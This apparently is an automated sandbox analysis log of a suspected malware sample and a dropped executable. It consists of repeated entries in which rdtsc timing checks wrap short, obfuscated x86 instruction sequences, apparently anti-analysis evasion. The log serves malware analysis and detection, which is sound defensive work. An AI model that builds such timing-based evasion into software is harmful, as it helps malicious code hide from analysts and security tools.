                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F393B0 second address: F393B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F393B5 second address: F393CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502ABCh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F393CA second address: F393D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40A10 second address: F40A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40A14 second address: F40A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40A18 second address: F40A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBBA8502AC4h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F4B4 second address: F3F4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A5h 0x00000009 jg 00007FBBA93ED296h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F4D8 second address: F3F4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F4DC second address: F3F4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F629 second address: F3F634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FBBA8502AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe RDTSC instruction interceptor: First address: F3F1DE second address: F3F1E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBE7 second address: 10BCBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBED second address: 10BCBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10BCBF1 second address: 10BCC06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FBBA93ED298h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC85C second address: 10DC888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBA8502ABFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBBA8502AC0h 0x00000011 je 00007FBBA8502AB6h 0x00000017 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DA892 second address: 10DA8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBBA93ED29Eh 0x00000011 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DA8BC second address: 10DA8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DA8C2 second address: 10DA8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBBA93ED2A5h 0x0000000e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB008 second address: 10DB00E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB314 second address: 10DB318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB4B7 second address: 10DB4C1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB4C1 second address: 10DB4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBBA93ED2A6h 0x0000000b jmp 00007FBBA93ED2A4h 0x00000010 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB7A6 second address: 10DB7C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBA8502AB6h 0x00000008 jl 00007FBBA8502AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FBBA8502ABCh 0x00000015 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB7C2 second address: 10DB7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 ja 00007FBBA93ED29Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB915 second address: 10DB91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC323 second address: 10DC329 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC329 second address: 10DC332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC332 second address: 10DC338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DEB6A second address: 10DEB9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBA8502AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FBBA8502ABFh 0x00000011 jng 00007FBBA8502AB6h 0x00000017 js 00007FBBA8502AB6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DEB9C second address: 10DEBA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A3691 second address: 10A3696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A3696 second address: 10A36A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ch 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E4355 second address: 10E4372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E4372 second address: 10E4378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E483E second address: 10E4871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBBA8502AC2h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBBA8502AC8h 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E4871 second address: 10E487B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBBA93ED296h 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E487B second address: 10E487F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E487F second address: 10E48A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBBA93ED2A4h 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48A1 second address: 10E48B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48B3 second address: 10E48B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48B9 second address: 10E48CE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA8502AB8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48CE second address: 10E48D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E389F second address: 10E38A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E38A4 second address: 10E38A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E49B5 second address: 10E49C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E49C1 second address: 10E49D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E49D1 second address: 10E49D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B278A second address: 10B27A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A2h 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B27A0 second address: 10B27B4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBA8502AB6h 0x00000008 ja 00007FBBA8502AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E792B second address: 10E7934 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7934 second address: 10E7940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBBA8502AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7C20 second address: 10E7C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A3h 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7C37 second address: 10E7C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FBBA8502ABEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7DBA second address: 10E7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A9h 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7DD7 second address: 10E7DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9AEB second address: 10E9AF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBBA93ED29Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9AF9 second address: 10E9B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 0FC3DEF0h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FBBA8502AB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, 6598B71Dh 0x0000002b push 9FC84B45h 0x00000030 js 00007FBBA8502AD0h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9C84 second address: 10E9C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9C8A second address: 10E9C94 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9E35 second address: 10E9E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EA017 second address: 10EA01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EAACC second address: 10EAAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EB03C second address: 10EB088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f jp 00007FBBA8502ABCh 0x00000015 popad 0x00000016 nop 0x00000017 mov di, 2A68h 0x0000001b mov dword ptr [ebp+122D2ABFh], ecx 0x00000021 push 00000000h 0x00000023 jne 00007FBBA8502AB6h 0x00000029 push 00000000h 0x0000002b add edi, dword ptr [ebp+122D3593h] 0x00000031 xchg eax, ebx 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ECBFD second address: 10ECC32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBBA93ED29Fh 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FBBA93ED298h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ED6F3 second address: 10ED6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ED6F7 second address: 10ED6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ED6FB second address: 10ED705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EDF84 second address: 10EDFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBA93ED2A2h 0x00000008 jmp 00007FBBA93ED2A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FBBA93ED298h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push 00000000h 0x00000031 add dword ptr [ebp+1247543Bh], ebx 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EDFE6 second address: 10EDFEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EDFEA second address: 10EDFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EEB87 second address: 10EEB91 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F6C49 second address: 10F6C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBBA93ED296h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F7AB4 second address: 10F7ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F7ABD second address: 10F7B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED29Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D2DA4h], esi 0x00000014 js 00007FBBA93ED29Ch 0x0000001a mov ebx, dword ptr [ebp+1245052Ch] 0x00000020 push 00000000h 0x00000022 add bl, 00000070h 0x00000025 push 00000000h 0x00000027 jng 00007FBBA93ED297h 0x0000002d stc 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBBA93ED2A9h 0x00000036 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FAADB second address: 10FAADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FBC47 second address: 10FBC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA0B second address: 10FDA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA0F second address: 10FDA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA19 second address: 10FDA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA1D second address: 10FDA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D1EDCh] 0x00000010 sub ebx, 021EFC83h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 mov ebx, 40F721A1h 0x0000001e pop edi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FBBA93ED298h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov edi, dword ptr [ebp+1247D5B7h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FBBA93ED29Dh 0x00000049 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA79 second address: 10FDA83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100DDF second address: 1100DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100DE5 second address: 1100E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007FBBA8502AB6h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FBBA8502AB8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b add dword ptr [ebp+1247E700h], esi 0x00000031 push 00000000h 0x00000033 je 00007FBBA8502AB8h 0x00000039 mov edi, edx 0x0000003b mov dword ptr [ebp+122D316Bh], esi 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007FBBA8502AB8h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 0000001Ah 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d mov dword ptr [ebp+12463030h], edi 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push edi 0x00000067 pushad 0x00000068 popad 0x00000069 pop edi 0x0000006a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100E61 second address: 1100E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100E67 second address: 1100E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
